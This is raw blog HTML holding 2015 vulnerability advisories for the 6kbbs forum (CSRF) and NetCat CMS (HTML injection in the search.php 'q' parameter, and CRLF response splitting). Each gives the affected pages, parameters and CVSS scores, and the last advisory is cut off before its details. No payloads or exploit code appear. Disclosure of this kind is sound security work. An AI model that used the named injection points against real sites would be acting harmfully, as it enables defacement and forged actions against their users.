<span style="font-family: Arial, Helvetica, sans-serif;">v7.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">v8.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs can be gain from here,</span><br />
<a href="http://www.6kbbs.com/download.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a><br />
<a href="http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">"6kbbs
V8.0 is a PHP + MySQL built using high-performance forum, has the code
simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast,
small; Interface generous and good scalability; functional and practical
pursuing superior performance, good interface, the user's preferred
utility functions."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">"1,
using XHTML + CSS architecture, so that the structure of the page,
saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted
Cookies, Session, Application and other technical data cache on the
forum, reducing access to the database to improve the performance of the
Forum. Can carry more users simultaneously access; 3, the data points
table function, reduce the burden on the amount of data when accessing
the database; 4, support for multi-skin style switching function; 5, the
use of RSS technology to support subscriptions forum posts, recent
posts, user's posts; 6, the display frame mode + tablet mode, the user
can choose according to their own preferences to; 7. forum page
optimization keyword search, so the forum more easily indexed by search
engines; 8, extension, for our friends to provide a forum for a broad
expansion of space services; 9, webmasters can add different top and
bottom of the ad, depending on the layout; 10, post using HTML + UBB way
the two editors, mutual conversion, compatible with each other; ..."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs
web application has a computer cyber security bug problem. It can be
exploited by CSRF (Cross-Site Request Forgery) attacks. This may allow
an attacker to trick the victim into clicking on the image to take
advantage of the trust relationship between the authenticated victim and
the application. Such an attack could trick the victim into creating
files that may then be called via a separate CSRF attack or possibly
other means, and executed in the context of their session with the
application, without further prompting or verification.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Several
6kbbs products 0-day vulnerabilities have been found by some other bug
hunter researchers before. 6kbbs has patched some of them. Open Sourced
Vulnerability Database (OSVDB) is an independent and open-sourced
database. The goal of the project is to provide accurate, detailed,
current, and unbiased technical information on security vulnerabilities.
The project promotes greater, open collaboration between companies and
individuals. It has published suggestions, advisories, solutions details
related to csrf vulnerabilities.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The
first code programming flaw occurs at "/portalchannel_ajax.php?" page
with "&id" and &code" parameters in HTTP $POST.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2) </b>The second code programming flaw occurs at "/admin.php?" page with "&fileids" parameter in HTTP $POST.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b><br />
<a href="http://cxsecurity.com/issue/WLB-2015040034"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/issue/WLB-2015040034</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/04/05/7"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/05/7</span></a><br />
<a href="http://www.intelligentexploit.com/view-details.html?id=21071"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.intelligentexploit.com/view-details.html?id=21071</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html</span></a><br />
<a href="http://seclists.org/fulldisclosure/2015/Apr/13"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/13</span></a><br />
<a href="http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-csrf</span></a><br />
<a href="http://essayjeans.blog.163.com/blog/static/237173074201551435316925/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/237173074201551435316925/</span></a><br />
<a href="https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/</span></a><br />
<a href="http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/234603051201551444917365/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551444917365/</span></a><br />
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/6kbbs-v8-0-csrf</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html</span></a><br />
<a href="https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-csrf</span></a><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-72893439837217018892015-06-14T01:03:00.000-07:002015-06-14T01:03:56.982-07:00OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-i8Nq2ebRUhs/VX0xTF1MPWI/AAAAAAAABDc/Wpvrvx3Mj4c/s1600/netcat_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://2.bp.blogspot.com/-i8Nq2ebRUhs/VX0xTF1MPWI/AAAAAAAABDc/Wpvrvx3Mj4c/s400/netcat_3.png" width="400" /></a></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;">OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML Injection Web Security Vulnerabilities</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 15, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 15, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Input Validation [CWE-20]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 120807</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Access Complexity: Medium</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Authentication: Not required to exploit</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Impact Type: Allows unauthorized modification</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (</span><a href="https://twitter.com/justqdjing/status/588152703639015424">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Advisory Details:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Version:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be downloaded from here,</span><br />
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is russian local company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat web application has a computer security bug problem. It can be exploited by HTML Injection attacks. Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Several NetCat products 0-day vulnerabilities have been found by some other bug hunter researchers before. NetCat has patched some of them. Web Security Watch is an aggregator of security reports coming from various sources. It aims to provide a single point of tracking for all publicly disclosed security issues that matter. "Its unique tagging system enables you to see a relevant set of tags associated with each security alert for a quick overview of the affected products. What's more, you can now subscribe to an RSS feed containing the specific tags that you are interested in - you will then only receive alerts related to those tags." It has published suggestions, advisories, solutions details related to cyber security vulnerabilities.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The programming code flaw occurs at "/catalog/search.php?" page with "&q" parameter.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b><br />
<a href="http://seclists.org/fulldisclosure/2015/Apr/37"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/37</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/04/15/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/15/3</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html</span></a><br />
<a href="http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/</span></a><br />
<a href="https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1</span></a><br />
<a href="http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/</span></a><br />
<a href="http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/</span></a><br />
<a href="http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html</span></a><br />
<a href="https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/</span></a><br />
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-120807-netcat-cms-312-html.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-120807.html</span></a><br />
<a href="http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html/</span></a><br />
<a href="http://germancast.blogspot.de/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/2015/06/netcat-html-injection.html</span></a><br />
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/netcat-cms-3-12-html-injection/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-22113821773324850942015-06-14T00:04:00.000-07:002015-06-14T00:08:00.182-07:00OSVDB 119342, 119323 NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-X1zuOgRq3Fg/VX0jsLMACFI/AAAAAAAABDM/m59HtJ8-uw0/s1600/netcat_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://2.bp.blogspot.com/-X1zuOgRq3Fg/VX0jsLMACFI/AAAAAAAABDM/m59HtJ8-uw0/s400/netcat_2.png" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>OSVDB 119342, 119323 </b></span><b><span style="font-family: Arial, Helvetica, sans-serif;">NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: March 07, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: March 07, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF Injection') [CWE-93]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 119342, 119343</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Discover and Author: <span style="background-color: white;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/574207452729622528">@justqdjing</a>)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Advisory Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be got from here,</span><br />
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is russian local company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
